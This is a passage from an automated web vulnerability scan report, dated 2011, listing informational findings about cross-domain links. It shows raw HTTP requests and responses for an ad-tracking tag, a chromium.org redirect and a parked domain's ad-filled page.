GET /site/3307?ret=html&phint=Channel%3DSports&phint=SubChannel%3DFight%2520Sports&phint=Place%3DNational&phint=Section%3DFight%2520Sports&phint=WriterTopic%3DFight%2520Sports%2520Examiner&phint=Topic%3DFight%2520Sports&phint=__bk_t%3DComplete%20WWE%20SmackDown%20Spoilers%20for%20Friday%20May%2013th%2C%20New%20'face'%20and%20new%20feuds%20-%20National%20Fight%20Sports%20%7C%20Examiner.com&phint=__bk_k%3DWWE%2C%20WWE%20SmackDown&limit=7&r=32920141 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkst=KJh5AeNgPWWDC3z/vmbrWP/vyuJkOrqppO0h0nojATMnL38JsqApZVAVBLP02yqgd/nQUf9HxhGCvR/uDDZbBwAB/Mjt+o8fqRJEFqpFzIjXnnepKTpKifrUQyUtZ4x5PAT76dN3rkj2JKrYgODVjjJS01HN/E1lLU9zFH1XQTjQLhxJGB4yUdfhmiAnJ7c7xI9ZJXreA19hCKuEaySWwFohEwpNfjjtXHBjFXkSR+GJ9aESmYr++39+fgqwva8LlSoT6kx1VAtaAKiP9KVDLKYA9gdVh/K+KLDc322/F0U2imaG5OO4eVt83qRv2lHi8C+MBDRGXlOMBkfFdP7IumyfRCI0UgzdfQ2tH3J4Pidfp2tL49tCm8dajdrEj3OmrI8K52DKCWuk7vzooedb2Rci8x8MqPRBDbibqXpt4sKIlqLidbjEEI/9qnesY37GMW/WpasYe0jQpOehIIAJLEXf2PVnS/rzwwv2AexlOuncY/JqpYRcQpRslc+zddlId7XlIQrc+7ru; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101EbdIJxF9Wk5O+x=; bklc=4dcbc695; bk=tOsYp6BGpSIVIHOf; bkc=KJh56e2n96WxCFc7d/1Z3YetuKWoPCj3oSYWNazZoBOYm46/QGJyvCSiCxC3/pqs0MnRVTPG9+RtRilt9DayJpv8ZtNZIEcF00fqcRwagReALh6axB58pFwaA7D7+Yb5RgyIkwot9nftTq3jrMBFl4RL44VtsyIEXaHdfqFrV4n3hpy6sFOt7lgkhag0b+Wz4nM2PzScr2SJjIZg46zQl/cnG8KIopNnUk6RC2o1xvVzI7LVRXZgWdK4CVJ9FJybwLORXroBBIfmRYoMtSF5PS0bdFkYvhoArm53lggiV4g37y7RK9dRYN+HAqVKS8bk7fU6NEZlKff8+fhccO2qkhJgm5PdJpmxOy==; bko=KJ0naVHQtYBXyoKH/DT/hgGOaNwkCqeRsuSh1EeX6Mf30XByO0CVD7wxkTkOkGIOGKcOSP2POAAGuTQCevMUC7X4DvXBAsDvj77pxkC1e/kxaMBeaPec0uDfQnnsf9y1IX9L9aT7/E/=; bkw5=KJppLZD9QZSsW6YuszHARsETpMwOCJaO09TCyTxiTtRwRM5ehjOkpJNh0x99gB61G9==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:33:33 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=foMj7Fd1lTmVIHOf; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh561XgHaWDOdeF2u1pW6GVaZGZKVHkQHPaA8Nb02WLVBeMENYDKLCYnvuyARthA+D6K0LB1tP+/fqstoHupCZ5rKIzpqN2m+dFFq4qb9VVCGefMNgG9eE/yXqBWS4Xqqpu84BBXFubxdprwVaXm3B5efEpHNeZXXPUcze7e7ehbat4NvTjzNIXxzF+9a9owq551rSXIYTek1F90TlllvWt8XVoBwOsXdmW2fS6Rtwril2fQs9EmB+dS7FDZwwiqO2xcc1GncodMDmjXIvRdMmqzTCZFSB5vcBKFWqn2EWyZeewhUxP83kd1kDBm2c5X7Jsrte144awwfebbg95P11zakGrs71dSKbn6pHfrwylFTz5cVM7RtlKhUIqxSPO; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0E8VBQScCytkKPxHnvWZv/aVHQtYBXyoKH/DT/hgGOaNwkCqeRsuSh1EYL4UMSk84CekYLomSQnhBesaY5e4XIGeGq/1LDpwnZCSCMjAiWLkQR3GYt7P0090Cgp1f9L9d19QekGuHu; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5Ae2gPWWDhSz/vsqUaJSORsWf1cdFp96oL38gPa0V5jmDYVXZ1XlYokMKFZe+JNMXYZZY/DN9YNWDWDmSBwA9Pi/t5ZZ2f2ALZKg0mI41w5yk2FWKGd40fGdIWF+1XhNVELSEyt30VU6M2/Ux/hjkAkg/hcDC1pKhzO02Wp0eCZYpa9ZQtdiddF4goY0RhJ6wQjrzn92Y9LzDAA2KsOObdrrDdaKnvIlvJ6JdYENQtQA9PBGTvbttGYlr+EbxFnvXABCGWFlkJZWAKZP9mVDLmv79qpq0ZXUWbz2nxZXJwVxTcOfafRW+7b77CULXBgm+AHGCkcZyBH62b5bL7jwlZn0ggBFoMUg2lScGk5VglQLln4zC5sqEIwHylwH3+IGu2Un+xDCD07A3/dlXppruN231+PQNuvc3FeRfL2ljEFKYIcVfqr/9qnesY37GZA/WpasYe0jQpOehIdLpXF8rNXz+GiN0XLQwx+nza/Qz/yCr1jLzeBGRXsY2dFFAd3NEdxBTeT9O; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJpqjLg9T1qjpcYO7RsOizcmAGsOAKWNMfxT9TmUnx1xBemz9Jn1/Yjx8MFwOOBsOiWfC9yEiG0qwRM5eOPekZklRsO/AtCZu9snFUH9tswrMWFwByXQCyFiBARsHZXx0zkNReGe9y9fkhZh; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 13-May-2011 13:33:33 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 375
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ad.yieldmanager.com/pixel?id=1182722&id=1183324&t=2" width=1 height=1 border=0 alt="">
<img src="http://sync.mathtag.com/sync/img?mt_exid=10002&redir=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2948%3Fphint%3Didswap_partner%253Dbk%26id%3DPARTNER_UUID" width=1 height=1 border=0 alt="">

</div>
...[SNIP]...
13.64. http://www.chromium.org/chromium-os/comp2jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chromium.org
Path:   /chromium-os/comp2jpg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /chromium-os/comp2jpg?attredirects=0&height=145&width=200 HTTP/1.1
Host: www.chromium.org
Proxy-Connection: keep-alive
Referer: http://www.chromium.org/chromium-os
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aftzc=QW1lcmljYS9Mb3NfQW5nZWxlczp3eGRhd0FxcWxWZkNYdHRkVVJ2ZStlVEpOOVE9

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: http://6541078575799853287-a-chromium-org-s-sites.googlegroups.com/a/chromium.org/dev/chromium-os/comp2jpg?attachauth=ANoY7cpJ9tpLk-l1T50irJkxDgarbLCnUlsW_R_VmTIKJyxkbuShUEhQ2Tj3auhJtn9bpwunijZ7L7H4Ouj6gdTP3U8yQ6Whxv2mqFy-TTRY-Aw832EqocA2iLs_pm7DPU9eTSUlNxxheaYYKBb02NxYhuYNlkhlGIV_X4VkCpRHH4t6O50cP437fhjyLpJgvlQDYcgqE0lv&attredirects=0&height=145&width=200
Date: Thu, 12 May 2011 13:31:33 GMT
Expires: Thu, 12 May 2011 13:31:33 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 552

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="http://6541078575799853287-a-chromium-org-s-sites.googlegroups.com/a/chromium.org/dev/chromium-os/comp2jpg?attachauth=ANoY7cpJ9tpLk-l1T50irJkxDgarbLCnUlsW_R_VmTIKJyxkbuShUEhQ2Tj3auhJtn9bpwunijZ7L7H4Ouj6gdTP3U8yQ6Whxv2mqFy-TTRY-Aw832EqocA2iLs_pm7DPU9eTSUlNxxheaYYKBb02NxYhuYNlkhlGIV_X4VkCpRHH4t6O50cP437fhjyLpJgvlQDYcgqE0lv&amp;attredirects=0&amp;height=145&amp;width=200">here</A>
...[SNIP]...
13.65. http://www.dailyfeatures.com/corridor/fodjava.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailyfeatures.com
Path:   /corridor/fodjava.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /corridor/fodjava.cfm?type=7 HTTP/1.1
Host: www.dailyfeatures.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 13:32:39 GMT
Server: domainserver
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 31664

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/TR/REC-html40"><head><meta http-equiv="Content-Type" content="text
...[SNIP]...
</title><link rel="stylesheet" type="text/css" href="http://www.gstatic.com/domainads/t/ocean/v1/css/afdo.css"></link>
<script
src="http://www.gstatic.com/domainads/js/afd_signals_1.js"
type="text/javascript">
</script>
...[SNIP]...
<h3><a href="https://www.google.com/adsense/support/bin/request.py?contact=abg_afc&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;client=ca-afdo-pub-3882615531336002&amp;gl=US" target="_blank">Sponsored Listings</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=l&amp;ai=BpC3cduHLTcWdOo7HsAfDmby6CuyBtoIC7MOkjx7AjbcB8Oi9ARABGAEg-PviHygKOABQlZLa0v7_____AWDJhoWJiKSEEKABrMaA_wOyARFkYWlseWZlYXR1cmVzLmNvbboBBGh0bWzIAQHaARlodHRwOi8vZGFpbHlmZWF0dXJlcy5jb20vyAKIy-wJqAMByAMZ6AOYA-gDwAPoA-0C9QNEAADE9QMgAAAA&amp;num=1&amp;adurl=http://clickserve.us2.dartsearch.net/link/click%3Flid%3D43000000164538122%26ds_s_kwgid%3D58000000001908546%26ds_e_adid%3D7989216428%26ds_e_matchtype%3Dcontent%26ds_url_v%3D2&amp;sig=AGiWqtxnI9bYqZk3m-VUAn3tIH2op0-IUg&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="title02">HP.. Laptops</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=l&amp;ai=BpC3cduHLTcWdOo7HsAfDmby6CuyBtoIC7MOkjx7AjbcB8Oi9ARABGAEg-PviHygKOABQlZLa0v7_____AWDJhoWJiKSEEKABrMaA_wOyARFkYWlseWZlYXR1cmVzLmNvbboBBGh0bWzIAQHaARlodHRwOi8vZGFpbHlmZWF0dXJlcy5jb20vyAKIy-wJqAMByAMZ6AOYA-gDwAPoA-0C9QNEAADE9QMgAAAA&amp;num=1&amp;adurl=http://clickserve.us2.dartsearch.net/link/click%3Flid%3D43000000164538122%26ds_s_kwgid%3D58000000001908546%26ds_e_adid%3D7989216428%26ds_e_matchtype%3Dcontent%26ds_url_v%3D2&amp;sig=AGiWqtxnI9bYqZk3m-VUAn3tIH2op0-IUg&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="url02">www.shopping.hp.com</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=l&amp;ai=BYHRFduHLTcWdOo7HsAfDmby6Ct3Nx9gB3fuLuRnAjbcB8IVhEAIYAiD4--IfKAo4AFC8tMbb-_____8BYMmGhYmIpIQQoAH3jc3xA7IBEWRhaWx5ZmVhdHVyZXMuY29tugEEaHRtbMgBAdoBGWh0dHA6Ly9kYWlseWZlYXR1cmVzLmNvbS-oAwHIAxnoA5gD6APAA-gD7QL1A0QAAMT1AyAAAAA&amp;num=2&amp;adurl=http://533.xg4ken.com/media/redir.php%3Fprof%3D3%26camp%3D890%26affcode%3Dcr3123033%26cid%3D6722446605%7C41475%7Clocal%2520news%26mType%3D%26networkType%3Dcontent%26url%5B%5D%3Dhttp%253A%252F%252Fwww.groupon.com%253Futm_source%253DGoogle%2526utm_medium%253Dcpc%2526utm_campaign%253DContent%2526d%253DNational_Content%2526g%253DNews_-_Local%2526utm_term%253Dlocal%2520news%2526p%253Ddailyfeatures.com%2526a%253DText%2526k_clickID%253D_kenshoo_clickid_&amp;sig=AGiWqtwygOiJ1M0s9uRDnujBl7JsrD7F6Q&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="title02">Local Coupons</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=l&amp;ai=BYHRFduHLTcWdOo7HsAfDmby6Ct3Nx9gB3fuLuRnAjbcB8IVhEAIYAiD4--IfKAo4AFC8tMbb-_____8BYMmGhYmIpIQQoAH3jc3xA7IBEWRhaWx5ZmVhdHVyZXMuY29tugEEaHRtbMgBAdoBGWh0dHA6Ly9kYWlseWZlYXR1cmVzLmNvbS-oAwHIAxnoA5gD6APAA-gD7QL1A0QAAMT1AyAAAAA&amp;num=2&amp;adurl=http://533.xg4ken.com/media/redir.php%3Fprof%3D3%26camp%3D890%26affcode%3Dcr3123033%26cid%3D6722446605%7C41475%7Clocal%2520news%26mType%3D%26networkType%3Dcontent%26url%5B%5D%3Dhttp%253A%252F%252Fwww.groupon.com%253Futm_source%253DGoogle%2526utm_medium%253Dcpc%2526utm_campaign%253DContent%2526d%253DNational_Content%2526g%253DNews_-_Local%2526utm_term%253Dlocal%2520news%2526p%253Ddailyfeatures.com%2526a%253DText%2526k_clickID%253D_kenshoo_clickid_&amp;sig=AGiWqtwygOiJ1M0s9uRDnujBl7JsrD7F6Q&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="url02">www.Groupon.com</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=l&amp;ai=ByrD6duHLTcWdOo7HsAfDmby6CrzTlZwCpMmHgSTAjbcBkN5OEAMYAyD4--IfKAo4AFDKnIP1-_____8BYMmGhYmIpIQQoAGUqezYA7IBEWRhaWx5ZmVhdHVyZXMuY29tugEEaHRtbMgBAdoBGWh0dHA6Ly9kYWlseWZlYXR1cmVzLmNvbS_IAvTBzBeoAwHIAxnoA5gD6APAA-gD7QL1A0QAAMT1AyAAAAA&amp;num=3&amp;adurl=http://livingsocial.com/deals/socialads_reflector%3Fdo_not_redirect%3D1%26preferred_city%3D199%26ref%3Dgoogle_mobilecontent6_199_winstonsalem&amp;sig=AGiWqtzJzZm1P6-0SRvEy5Di0rTkqco43A&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="title02">Winston 1-Day Coupons</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=l&amp;ai=ByrD6duHLTcWdOo7HsAfDmby6CrzTlZwCpMmHgSTAjbcBkN5OEAMYAyD4--IfKAo4AFDKnIP1-_____8BYMmGhYmIpIQQoAGUqezYA7IBEWRhaWx5ZmVhdHVyZXMuY29tugEEaHRtbMgBAdoBGWh0dHA6Ly9kYWlseWZlYXR1cmVzLmNvbS_IAvTBzBeoAwHIAxnoA5gD6APAA-gD7QL1A0QAAMT1AyAAAAA&amp;num=3&amp;adurl=http://livingsocial.com/deals/socialads_reflector%3Fdo_not_redirect%3D1%26preferred_city%3D199%26ref%3Dgoogle_mobilecontent6_199_winstonsalem&amp;sig=AGiWqtzJzZm1P6-0SRvEy5Di0rTkqco43A&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="url02">www.LivingSocial.com</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=l&amp;ai=BqtdfduHLTcWdOo7HsAfDmby6CuTE-YUCnP-zwh7AjbcBkOUiEAQYBCD4--IfKAo4AFDsp9S6BmDJhoWJiKSEEKABjvnO8gOyARFkYWlseWZlYXR1cmVzLmNvbboBBGh0bWzIAQHaARlodHRwOi8vZGFpbHlmZWF0dXJlcy5jb20vgAIBqAMByAMZ6AOYA-gDwAPoA-0C9QNEAADE9QMgAAAA&amp;num=4&amp;adurl=http://www.savecoin.com&amp;sig=AGiWqtwjIC-v9MybHGyvDK55MxzQWCDHtQ&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="title02">Fargo Daily Deals</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=l&amp;ai=BqtdfduHLTcWdOo7HsAfDmby6CuTE-YUCnP-zwh7AjbcBkOUiEAQYBCD4--IfKAo4AFDsp9S6BmDJhoWJiKSEEKABjvnO8gOyARFkYWlseWZlYXR1cmVzLmNvbboBBGh0bWzIAQHaARlodHRwOi8vZGFpbHlmZWF0dXJlcy5jb20vgAIBqAMByAMZ6AOYA-gDwAPoA-0C9QNEAADE9QMgAAAA&amp;num=4&amp;adurl=http://www.savecoin.com&amp;sig=AGiWqtwjIC-v9MybHGyvDK55MxzQWCDHtQ&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="url02">www.savecoin.com</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=L&amp;ai=BDdooduHLTcWdOo7HsAfDmby6CoyY4vIB3K6K8BrAjbcBwM8kEAUYBSD4--IfKAo4AFDFg5qMBmDJhoWJiKSEELIBEWRhaWx5ZmVhdHVyZXMuY29tugEEaHRtbMgBAdoBGWh0dHA6Ly9kYWlseWZlYXR1cmVzLmNvbS_IAqzq_RioAwHIAxnoA5gD6APAA-gD7QL1A0QAAMT1AyAAAAA&amp;num=5&amp;adurl=http://track.searchignite.com/si/cm/tracking/clickredirect.aspx%3Fsicontent%3D1%26sicreative%3D7120385940%26sitrackingid%3D216614335&amp;sig=AGiWqtwKHQkW4QC0gn_3nikK3iotRHsSrw&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="title02">Newspaper</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=L&amp;ai=BDdooduHLTcWdOo7HsAfDmby6CoyY4vIB3K6K8BrAjbcBwM8kEAUYBSD4--IfKAo4AFDFg5qMBmDJhoWJiKSEELIBEWRhaWx5ZmVhdHVyZXMuY29tugEEaHRtbMgBAdoBGWh0dHA6Ly9kYWlseWZlYXR1cmVzLmNvbS_IAqzq_RioAwHIAxnoA5gD6APAA-gD7QL1A0QAAMT1AyAAAAA&amp;num=5&amp;adurl=http://track.searchignite.com/si/cm/tracking/clickredirect.aspx%3Fsicontent%3D1%26sicreative%3D7120385940%26sitrackingid%3D216614335&amp;sig=AGiWqtwKHQkW4QC0gn_3nikK3iotRHsSrw&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="url02">AutoTrader.com</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=L&amp;ai=BHw7CduHLTcWdOo7HsAfDmby6Cq6p6PwB3reRhSXAjbcB8LkmEAYYBiD4--IfKAo4AFDjsvljYMmGhYmIpIQQsgERZGFpbHlmZWF0dXJlcy5jb226AQRodG1syAEB2gEZaHR0cDovL2RhaWx5ZmVhdHVyZXMuY29tL4ACAagDAcgDGegDmAPoA8AD6APtAvUDRAAAxPUDIAAAAA&amp;num=6&amp;adurl=http://www.shoutbackconcepts.com&amp;sig=AGiWqtwztFNYrEPhaHoUawZt4GqON6uN-A&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="title02">Daily Deals for Magazines</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=L&amp;ai=BHw7CduHLTcWdOo7HsAfDmby6Cq6p6PwB3reRhSXAjbcB8LkmEAYYBiD4--IfKAo4AFDjsvljYMmGhYmIpIQQsgERZGFpbHlmZWF0dXJlcy5jb226AQRodG1syAEB2gEZaHR0cDovL2RhaWx5ZmVhdHVyZXMuY29tL4ACAagDAcgDGegDmAPoA8AD6APtAvUDRAAAxPUDIAAAAA&amp;num=6&amp;adurl=http://www.shoutbackconcepts.com&amp;sig=AGiWqtwztFNYrEPhaHoUawZt4GqON6uN-A&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="url02">www.shoutbackconcepts.com</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=l&amp;ai=BiQEeduHLTcWdOo7HsAfDmby6CvXK5tUBzZG8qRLAjbcBwM8kEAcYByD4--IfKAo4AFCMtcaS-v____8BYMmGhYmIpIQQoAG0jLL_A7IBEWRhaWx5ZmVhdHVyZXMuY29tugEEaHRtbMgBAdoBGWh0dHA6Ly9kYWlseWZlYXR1cmVzLmNvbS-AAgHIAr2avwGoAwHIAxnoA5gD6APAA-gD7QL1A0QAAMT1AyAAAAA&amp;num=7&amp;adurl=http://www.sparkpeople.com/myspark/landingsplit.asp%3Ffrom%3Dgg_fjournal&amp;sig=AGiWqtxfWatKe72seAs6n7ODJUWp7K7dsg&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="title02">Daily weight loss journal</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=l&amp;ai=BiQEeduHLTcWdOo7HsAfDmby6CvXK5tUBzZG8qRLAjbcBwM8kEAcYByD4--IfKAo4AFCMtcaS-v____8BYMmGhYmIpIQQoAG0jLL_A7IBEWRhaWx5ZmVhdHVyZXMuY29tugEEaHRtbMgBAdoBGWh0dHA6Ly9kYWlseWZlYXR1cmVzLmNvbS-AAgHIAr2avwGoAwHIAxnoA5gD6APAA-gD7QL1A0QAAMT1AyAAAAA&amp;num=7&amp;adurl=http://www.sparkpeople.com/myspark/landingsplit.asp%3Ffrom%3Dgg_fjournal&amp;sig=AGiWqtxfWatKe72seAs6n7ODJUWp7K7dsg&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="url02">SparkPeople.com/Free_Diet_Journal</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=L&amp;ai=BUAxXduHLTcWdOo7HsAfDmby6CtWTtK0Cjde6lSLAjbcB4LdgEAgYCCD4--IfKAo4AFDc_uG5_f____8BYMmGhYmIpIQQsgERZGFpbHlmZWF0dXJlcy5jb226AQRodG1syAEB2gEZaHR0cDovL2RhaWx5ZmVhdHVyZXMuY29tL8gCzd3mHagDAcgDGegDmAPoA8AD6APtAvUDRAAAxPUDIAAAAA&amp;num=8&amp;adurl=https://dallasnews.regsignup.com/tdmnsearch&amp;sig=AGiWqtw_m9TeuCypmMK4jwlty-yZw_RkcA&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="title02">The Dallas Morning News</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=L&amp;ai=BUAxXduHLTcWdOo7HsAfDmby6CtWTtK0Cjde6lSLAjbcB4LdgEAgYCCD4--IfKAo4AFDc_uG5_f____8BYMmGhYmIpIQQsgERZGFpbHlmZWF0dXJlcy5jb226AQRodG1syAEB2gEZaHR0cDovL2RhaWx5ZmVhdHVyZXMuY29tL8gCzd3mHagDAcgDGegDmAPoA8AD6APtAvUDRAAAxPUDIAAAAA&amp;num=8&amp;adurl=https://dallasnews.regsignup.com/tdmnsearch&amp;sig=AGiWqtw_m9TeuCypmMK4jwlty-yZw_RkcA&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="url02">DallasNews.Regsignup.com/tdmnsearch</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=l&amp;ai=BUiTZduHLTcWdOo7HsAfDmby6CvG3rpQCmdvc_SbAjbcBsPIoEAkYCSD4--IfKAo4AFD6krCjAmDJhoWJiKSEEKABl4q42AOyARFkYWlseWZlYXR1cmVzLmNvbboBBGh0bWzIAQHaARlodHRwOi8vZGFpbHlmZWF0dXJlcy5jb20vgAIBqAMByAMZ6AOYA-gDwAPoA-0C9QNEAADE9QMgAAAA&amp;num=9&amp;adurl=http://www.chakrahealing.com/lp/%3Fsr%3D1&amp;sig=AGiWqtyW5kqPqSyUeM7tgR_wlrvBo1SXqA&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="title02">3-Minute Chakra Test</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=l&amp;ai=BUiTZduHLTcWdOo7HsAfDmby6CvG3rpQCmdvc_SbAjbcBsPIoEAkYCSD4--IfKAo4AFD6krCjAmDJhoWJiKSEEKABl4q42AOyARFkYWlseWZlYXR1cmVzLmNvbboBBGh0bWzIAQHaARlodHRwOi8vZGFpbHlmZWF0dXJlcy5jb20vgAIBqAMByAMZ6AOYA-gDwAPoA-0C9QNEAADE9QMgAAAA&amp;num=9&amp;adurl=http://www.chakrahealing.com/lp/%3Fsr%3D1&amp;sig=AGiWqtyW5kqPqSyUeM7tgR_wlrvBo1SXqA&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="url02">www.ChakraHealing.com</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=l&amp;ai=BMQLLduHLTcWdOo7HsAfDmby6CuKD8uoBgvqKsRTAjbcBwJM4EAoYCiD4--IfKAo4AFDx_93C-v____8BYMmGhYmIpIQQoAH8s8D_A7IBEWRhaWx5ZmVhdHVyZXMuY29tugEEaHRtbMgBAdoBGWh0dHA6Ly9kYWlseWZlYXR1cmVzLmNvbS-AAgHIAvL9vAuoAwHIAxnoA5gD6APAA-gD7QL1A0QAAMT1AyAAAAA&amp;num=10&amp;adurl=http://arablounge.com/%3FaffiliateID%3DADa_Al_en_gg_C-USA2_news&amp;sig=AGiWqtxP0uAsFLICAwdPMG3241yIT-lcBw&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="title02">Meet Arab Singles</a>
...[SNIP]...
<div><a href="http://googleads.g.doubleclick.net/aclk?sa=l&amp;ai=BMQLLduHLTcWdOo7HsAfDmby6CuKD8uoBgvqKsRTAjbcBwJM4EAoYCiD4--IfKAo4AFDx_93C-v____8BYMmGhYmIpIQQoAH8s8D_A7IBEWRhaWx5ZmVhdHVyZXMuY29tugEEaHRtbMgBAdoBGWh0dHA6Ly9kYWlseWZlYXR1cmVzLmNvbS-AAgHIAvL9vAuoAwHIAxnoA5gD6APAA-gD7QL1A0QAAMT1AyAAAAA&amp;num=10&amp;adurl=http://arablounge.com/%3FaffiliateID%3DADa_Al_en_gg_C-USA2_news&amp;sig=AGiWqtxP0uAsFLICAwdPMG3241yIT-lcBw&amp;client=ca-afdo-pub-3882615531336002" target="_blank" class="url02">ArabLounge.com</a>
...[SNIP]...
<li><a class="relatedLink" target="_top" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=r&amp;q=Love Horoscope&amp;afdt=q7mmHSosTawKEwjSnsTIw-KoAhUMaZ0KHdcgS74YASAAMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Love Horoscope</a>
...[SNIP]...
<li><a class="relatedLink" target="_top" href="http://domains.googlesyndication.com/apps/domainpark/results.cgi?client=ca-afdo-pub-3882615531336002&amp;url=http://dailyfeatures.com/&amp;hl=en&amp;fmt=4&amp;ac=r&amp;q=Daily Horoscope&amp;afdt=haHpZOPV5NAKEwjSnsTIw-KoAhUMaZ0KHdcgS74YASABMPDQsAg4DVDw0LAIUIjbxAlQkKbOD1C5n_cPUMjOhB1Q6o-CIVCq-JwhUJLQrSlQ-dzKowFQuIjcrwFQlLb31QFZNn1WXhTqAOI">Daily Horoscope</a>
...[SNIP]...
